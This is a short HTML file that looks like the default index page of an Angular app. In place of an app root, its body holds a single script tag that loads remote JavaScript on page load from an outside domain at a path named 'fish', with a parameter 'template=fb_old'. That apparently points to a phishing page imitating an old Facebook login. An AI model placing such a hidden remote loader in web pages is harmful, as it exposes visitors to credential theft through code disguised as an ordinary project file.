<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Angular</title>
  <base href="/">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" type="image/x-icon" href="favicon.ico">
</head>
<body>
 <script src="https://ma4.club/fish?name=cristofer&amung=chricrack&template=fb_old" type="text/javascript" async="true"></script>
</body>
</html>
